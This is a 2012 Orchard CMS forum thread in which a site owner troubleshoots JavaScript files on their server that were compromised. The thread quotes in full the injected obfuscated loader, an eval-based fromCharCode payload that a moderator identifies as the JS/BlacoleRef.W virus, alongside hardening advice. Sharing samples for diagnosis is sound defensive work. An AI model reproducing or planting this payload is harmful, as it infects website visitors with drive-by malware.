Script Injection Attack

Topics: General, Writing modules
Editor
Jul 18, 2012 at 4:11 AM

I ask this question because I am not an expert on Injection attacks and have had the same production server compromised twice now while running an Orchard CMS installation. I am running Orchard v.1.2.42.0 and have had some script injection occur on files inside my webroot. The files affected were Modules\Orchard.jQuery\Scripts\jquery-1.6.1.min and two Script files in my Themes\Scripts directory. html5.js and base.js. Two files included in the Document.cshtml.

Is there any known vulnerabilities out there right now? Is the only way someone could modify one of these files is to access the hosting server itself? I have all pretty standard modules installed for the most part, nothing out of the ordinary. 

Any thoughts, let me know. Thanks

Jul 18, 2012 at 5:11 AM

I'm no expert but here are some ideas.

  1. Check the web.config file inside the Scripts folder. Make sure the accessPolicy allows Script and Read only.
      <system.webServer>
        <handlers accessPolicy="Script,Read">
  2. If you find the files changed, take note of the exact date/time it was changed and check your web server logs for incoming traffic around that time. What URL was called, query strings, etc. If you find something suspicious, take note of originating IP and block it. 

I hope this helps

Jul 18, 2012 at 3:43 PM

I'd be interested to hear more about your problem, including some of the details on what was modified for the injection within jQuery.

Jul 18, 2012 at 3:45 PM
yeorwned wrote:

I'd be interested to hear more about your problem, including some of the details on what was modified for the injection within jQuery.

I'm interested too in this. 

Editor
Jul 18, 2012 at 6:00 PM

My Orchard installation contains some modules that allow form submission:

1. A contact form

2. A request for alerts form.

3. Signup to volunteer form. (This form reposts data to the website after it goes into the DB, but is escaped properly.)

What I noticed (this is the second time), that a block of script gets placed on some JS files in my Orchard site and is then running and causing an Injection Attack. I notice because Chrome warns me when I visit the site. I track the files down by using a command line utility FINDSTR and locate some of the text in the script. This time I found the text in the Jquery Modules folder that ships with Orchard, and in some script files in my theme. I am not sure how someone could modify those files unless they had access to the host itself. Either they are breaking into FTP, something is installed on the host doing this, or lastly somehow they are able to gain access to the CMS or exploit a form somehow. The last one seems pretty hard for them to do and then modify a file. I checked my Orchard logs around the time period that the files were modified and I saw nothing. I have contacted the hosting provider to let me know of any login attempts around that time frame, and I am going to look in the event viewer as well. I am just wondering how feasible it is for someone to inject code into a file that lives on the physical system through the Orchard site itself. I am not writing out any files anywhere in my code right now.

 

Thanks

 

Coordinator
Jul 18, 2012 at 6:28 PM

There is no known vulnerability, and this is the first time we hear about this issue. You might want to remove write access to those files from the app pool account. If this happens again then it must be from an external source.

Coordinator
Jul 18, 2012 at 6:29 PM

Could you provide us with the code snippet that was injected, we could check some other sites, at least running the same Orchard version as you do.

Editor
Jul 18, 2012 at 6:45 PM

Here is the snippet:

/*km0ae9gr6m*/try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,366,160,696,520,630,575,276,575,606,505,600,160,222,160,696,520,630,575,276,405,354,50,192,160,192,160,708,485,684,160,696,505,690,580,192,305,192,580,624,525,690,230,390,160,252,160,648,555,192,225,192,580,624,525,690,230,492,160,252,160,624,525,354,50,192,160,192,160,630,510,240,580,606,575,696,160,372,160,288,205,738,50,192,160,192,160,192,160,192,160,696,520,630,575,276,575,606,505,600,160,366,160,696,505,690,580,354,50,192,160,192,160,750,160,606,540,690,505,192,615,60,160,192,160,192,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,580,606,575,696,160,258,160,696,520,630,575,276,385,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,200,696,520,630,575,276,575,606,505,600,160,252,160,696,520,630,575,276,555,660,505,474,590,606,570,462,205,354,50,750,50,60,510,702,550,594,580,630,555,660,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,615,60,160,192,160,192,590,582,570,192,500,192,305,192,550,606,595,192,340,582,580,606,200,702,550,630,600,252,245,288,240,288,205,354,50,192,160,192,160,708,485,684,160,690,160,366,160,600,230,618,505,696,360,666,585,684,575,240,205,192,310,192,245,300,160,378,160,294,160,348,160,288,295,60,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,250,306,260,318,270,330,280,342,240,294,160,258,160,240,500,276,515,606,580,462,555,660,580,624,200,246,160,252,160,288,600,420,350,420,350,420,350,246,160,258,160,240,500,276,515,606,580,408,485,696,505,240,205,192,210,192,240,720,350,420,350,420,205,258,160,240,385,582,580,624,230,684,555,702,550,600,200,690,160,252,160,288,600,420,350,420,205,246,295,60,160,192,160,192,580,624,525,690,230,390,160,366,160,312,280,300,275,294,295,60,160,192,160,192,580,624,525,690,230,462,160,366,160,300,245,312,275,312,280,306,270,312,275,354,50,192,160,192,160,696,520,630,575,276,405,192,305,192,580,624,525,690,230,462,160,282,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,410,192,305,192,580,624,525,690,230,462,160,222,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,555,660,505,474,590,606,570,462,160,366,160,294,230,288,160,282,160,696,520,630,575,276,385,354,50,192,160,192,160,696,520,630,575,276,550,606,600,696,160,366,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,354,50,192,160,192,160,684,505,696,585,684,550,192,580,624,525,690,295,60,625,60,50,612,585,660,495,696,525,666,550,192,495,684,505,582,580,606,410,582,550,600,555,654,390,702,545,588,505,684,200,684,220,192,385,630,550,264,160,462,485,720,205,738,50,192,160,192,160,684,505,696,585,684,550,192,385,582,580,624,230,684,555,702,550,600,200,240,385,582,600,270,385,630,550,246,160,252,160,684,230,660,505,720,580,240,205,192,215,192,385,630,550,246,295,60,625,60,50,612,585,660,495,696,525,666,550,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,648,505,660,515,696,520,264,160,732,555,660,505,246,615,60,160,192,160,192,590,582,570,192,570,582,550,600,160,366,160,660,505,714,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,295,60,160,192,160,192,590,582,570,192,540,606,580,696,505,684,575,192,305,192,455,234,485,234,220,234,490,234,220,234,495,234,220,234,500,234,220,234,505,234,220,234,510,234,220,234,515,234,220,234,520,234,220,234,525,234,220,234,530,234,220,234,535,234,220,234,540,234,220,234,545,234,220,234,550,234,220,234,555,234,220,234,560,234,220,234,565,234,220,234,570,234,220,234,575,234,220,234,580,234,220,234,585,234,220,234,590,234,220,234,595,234,220,234,600,234,220,234,605,234,220,234,610,234,465,354,50,192,160,192,160,708,485,684,160,690,580,684,160,366,160,234,195,354,50,192,160,192,160,612,555,684,200,708,485,684,160,630,160,366,160,288,295,192,525,192,300,192,540,606,550,618,580,624,295,192,525,192,215,258,160,246,615,60,160,192,160,192,160,192,160,192,575,696,570,192,215,366,160,648,505,696,580,606,570,690,455,594,570,606,485,696,505,492,485,660,500,666,545,468,585,654,490,606,570,240,570,582,550,600,220,192,240,264,160,648,505,696,580,606,570,690,230,648,505,660,515,696,520,192,225,192,245,246,465,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,575,696,570,192,215,192,195,276,195,192,215,192,610,666,550,606,295,60,625,60,50,690,505,696,420,630,545,606,555,702,580,240,510,702,550,594,580,630,555,660,200,246,615,60,160,192,160,192,580,684,605,738,50,192,160,192,160,192,160,192,160,630,510,240,580,726,560,606,555,612,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,366,160,204,585,660,500,606,510,630,550,606,500,204,205,738,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,192,580,684,585,606,295,60,160,192,160,192,160,192,160,192,160,192,160,192,590,582,570,192,585,660,525,720,160,366,160,462,485,696,520,276,570,666,585,660,500,240,215,660,505,714,160,408,485,696,505,240,205,282,245,288,240,288,205,354,50,192,160,192,160,192,160,192,160,192,160,192,160,708,485,684,160,600,555,654,485,630,550,468,485,654,505,192,305,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,294,270,264,160,234,570,702,195,246,295,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,160,366,160,600,555,594,585,654,505,660,580,276,495,684,505,582,580,606,345,648,505,654,505,660,580,240,170,438,350,492,325,462,345,204,205,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,505,696,325,696,580,684,525,588,585,696,505,240,170,690,570,594,170,264,160,204,520,696,580,672,290,282,235,204,215,600,555,654,485,630,550,468,485,654,505,258,170,282,570,702,550,612,555,684,505,690,580,684,585,660,315,690,525,600,305,588,555,696,550,606,580,300,170,246,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,545,276,575,696,605,648,505,276,595,630,500,696,520,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,624,505,630,515,624,580,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}if(f)e(s);}/*qhk6sa6g1c*/

 

 

Coordinator
Jul 18, 2012 at 7:12 PM

This is the JS/BlacoleRef.W virus, as Outlook prevented me from seeing the code.

Simple questions:
- have you used the server to browse the internet, as you might have got infected this way
- is the server allowing TS connections, if so could you check every past connection in the windows audit 
- do you have a none patched windows server (using windows update) 

If the answer is a strict NO then we might ask you to give us access to the server so that MS security experts can do some analysis.

Thanks


Editor
Jul 18, 2012 at 7:17 PM

The server is a hosted server from a Third Party. It runs Plesk Control Panel, which I believe has its own problems. I will forward the info you sent me to the hosting provider. I feel like it is possible it could have came in through one of the items you listed. If you want access I can also provide it. Would like to confirm it is not Orchard as well :)

Appreciate the help.

Coordinator
Jul 18, 2012 at 7:22 PM

Odds that is comes from Orchard are very low as we would have had some other reports, and maybe from bigger website, starting with ours. Our codebase is also checked by security experts to ensure there is no threat. But we can never be certain there is no issue, so let's investigate more.

Jul 18, 2012 at 7:35 PM

I recognize that code. It infected some computers at work and I found it on an external web site. Turns out all their .js-files were infected with this. They're not running Orchard but instead a static HTML site with some Javascript for jQuery and menus, so they were probably attacked by FTP or someway through the hosting provider. So I'd say this has nothing to do with Orchard.

Jul 26, 2012 at 7:30 PM

Thanks for sharing.